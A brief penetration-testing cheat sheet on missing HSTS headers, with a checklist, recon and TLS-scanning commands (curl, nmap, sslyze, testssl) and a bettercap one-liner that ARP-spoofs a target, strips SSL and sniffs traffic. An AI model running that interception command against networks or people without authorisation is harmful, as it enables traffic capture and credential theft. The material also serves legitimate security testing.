HTTP Strict Transport Security
Check List
Cheat Sheet
Methodology
Missing HSTS (HTTP Strict Transport Security)
1
Access the Target URL and Inspect the Response Headers Use a tool such as Burp Suite, cURL, or browser dev tools to inspect the HTTP response headers The best way is to use this cheat sheet Example using cURL
2
Check for HSTS Header Confirm the absence of the following header in the server response Strict-Transport-Security
The best way to exploit and exploit this vulnerability is to use a cheat sheet
Recon Header
curl -s -D- $WEBSITE | grep -i strict
nmap -sS -sV --mtu 5000 --script ssl-enum-ciphers $WEBSITE
Scan Vulnerabilities
sslyze $WEBSITE
testssl $WEBSITE
MitM
INTERFACE=$(ip -o -4 addr show | awk '{print $2}' | grep -v "lo" | head -n 1)
bettercap -iface $INTERFACE -eval "set arp.spoof.targets $TARGET; arp.spoof on; http.proxy on; http.proxy.sslstrip true; net.sniff on"
Last updated